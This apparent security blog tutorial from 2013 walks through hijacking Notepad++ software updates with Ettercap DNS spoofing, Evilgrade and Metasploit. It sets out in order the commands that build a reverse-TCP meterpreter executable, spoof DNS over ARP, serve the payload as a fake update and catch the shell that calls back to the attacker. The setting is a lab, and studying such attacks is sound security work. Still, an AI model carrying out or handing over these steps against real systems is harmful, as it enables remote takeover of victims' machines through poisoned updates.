Information Security, Web, Networks and Systems

Saturday, June 29, 2013

Evilgrade - Ettercap - Metasploit - Malware Injection into SoftwareUpdates

In this post I am going to describe how Evilgrade can be used with the combination of Ettercap for an amazing attack. Evilgrade is a tool free shipped with Backtrack 5 OS as same as Ettercap. This tool can be used to inject malware into a victim's machine while a software update download is happenning. This is also called a Man In The Middle Attack. When this attack is going on, victim downloads an update for a software in his computer but actually a malware is being downloaded with the face of a legal software update. Natural thing is once a software update is finished downloading, it executes and updates the software. But in this case, its the malware which was downloaded and it gets executed by the software after being downloaded. Finally the victim's computer gets infected.
To convey this attack, I use following tools.

Metasploit (msfpayload and multi/handler exploit)
Attacker's computer - BackTrack Virtual Machine ( IP: )
Victim's computer - Windows XP sp2 Virtual Machine ( IP: ; on the same network with Attacker's computer)
Vulnerable Notepad++ installed on victim's machine.

Since all of those are contained in BackTrack, I am using BackTrack for this attack. Otherwise you can seperately download and install Evilgrade on a linux machine. You can download vulnerable notepad++ version from below link.

So lets start.

Procedure :-

  • Once the victim check's for Notepad++ updates, that request is spoofed to a fake web server created by Evilgrade which hosts the malware. This request spoof is done using DNS spoofing with Ettercap.

  • Then user gets a message saying that an update is available and when he downloads it, hosted malware is downloaded to his machine and gets executed.

  • We creates this malware using Metasploit's msfpayload which connects back to the attacker's machine and gives attacker the controller of the victim's machine through a meterpreter session.

  • Once the meterpreter session is opened in attacker's computer attack is completed and then post-exploitations can be done using meterpreter session

Starting Evilgrade

In BackTrack 5, Evilgrade is located at,
 /pentest/exploits/isr-evilgrade/ folder
We can go into that folder and start evilgrade using
 ./evilgrade command

Then you will see Evilgrade starts.

In Evilgrade, there are a set of modules (in this case, 63) available to attack a popular set of software. You can view this list simply running show modules command.

Since we are going to attack Notepad++ we can use notepadplus module. To select that module run following command. You can see available options for this module using show options command.

     configure notepadplus
     show options

You can see that there is an option called "agent". This is simply the malware that we are going to inject. We should create a malware for our particular purpose using metasploit and then we can use it as the agent for Evilgrade. Keep this Evilgrade terminal alive aside and lets create the malware next.

Creating Malware

Lets create a malware which connects back to the attacker's computer and opens a meterpreter session for attacker.

Note: I am not going to describe how meterpreter session can be used to do various things on victim's computer. You can find out easily in web what meterpreter can do

I am going to use Metasploit's msfpayload for creating a malware using meterpreter/reverse_tcp payload. I create this malware as a .exe file and save it as /root/a.exe. This command does it for me. Open a new terminal and execute following command.

msfpayload windows/meterpreter/reverse_tcp LHOST="" LPORT=4444 X > /root/a.exe

LHOST means the IP address of the attacker's (your's) BackTrack machine and LPORT is the port which the malware should connect back. You can use any other free port for this. But I'll keep it as the default one '4444'.

Then the malware will be created as a.exe and will be stored in /root/ folder.

Then we have created the malware, we can use it in Evilgrade for the attack. What we have to do next is spoofing victim's update request to the server hosted by Evilgrade (which is the attacker's backtrack machine)

Now look at the options in Evilgrade for notepadplus again.

There is an option called VirtualHost which is "". This is the website which Notepad++ requests for updates. Using DNS Spoofing we spoof this request to "" to our BackTrack machine where Evilgrade runs. We can use Ettercap for this. ( I have previously posted how to use Ettercap for DNS Spoofing.)

Add an entry for this in etter.dns file and start DNS spoofing as follows.

Then start DNS Spoof by executing following command.

   ettercap -T -Q -M arp -P dns_spoof / //

Use your BackTrack machine's IP address for the above command instead of
Then you will see DNS spoofing is running. Now go to Attacker's machine, and lets start Evilgrader Web server.

Go to the terminal that Evilgrade is opened. What we have to do now is start the Evilgrade webserver and set agent to our malware. Execute following command and set agent to our malware, /root/a.exe

     set agent '["/root/a.exe"]'

Note carefully the syntax of the above command.

Then start Evilgrade webserver using start command in Evilgrade.


Then you should see a web server and a DNS server starts and they are listening for connections.

Final Step - Start a listener in Metasploit

 We have now done 95% of work. Since our malware connects back to our machine from the victim's machine, we should have a listener running in our machine for an incoming connection from the malware. For this, we can use Multi Handler module in Metasploit.

Open another new terminal and start metasploit.


After metasploit started, start Multi Handler in metasploit

msf > use exploit/multi/handler
msf  exploit (handler)  > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit (handler)  > set LHOST
msf  exploit (handler)  > set LPORT 4444
msf  exploit (handler)  > exploit

Then the multi handler starts and starts listening for an incoming connection from the malware.

Now we have done all work.

  • We created the malware
  • Hosted using Evilgrade and Evilgrade is listening for a connection
  • DNS spoof attack is running on victim's machine which directs update requests to our malware hosting machine.
  • A listener is running on our machine for an incoming connection from the malware.

Lets's see how attack happens.

Go to Victim's machine. In my case , it is a Windows XP sp2 virtual machine on the same network with Attacking machine.

Start Notepad++. And try to update.

Then you will see something is going on in the terminals which Ettercap is running and Evilgrade is running.

We can see from Ettercap that the update request is spoofed to the malware hosting BackTrack machine.

And also you'll see Evilgrade is responding to the update request.

While these are going on, you will see a notification from Notepad++ that an update is available and asking you whether to download it.

Now click Yes and let Notepad++ download and install the update that it says available.

When you click Yes, You'll see update is being downloaded and will give you a message saying as follows.

Click Yes again and Notepad++ will be closed. You will notice in the Evilgrade, that our malware /root/a.exe is downloaded by Notepad++ and executed.

As it is executed, It tries to connect back to the attacking machine. Since we are running a listener in Metasploit, it connects with Metasploit and opens a Meterpreter Session for you.


You have successfully attacked Windows XP machine. !!!!

This post became really long than I thought. But I honestly hope that it would be helpful for you. Please leave a comment below if you have any idea to share. Thank you.


Post a Comment

Note: Only a member of this blog may post a comment.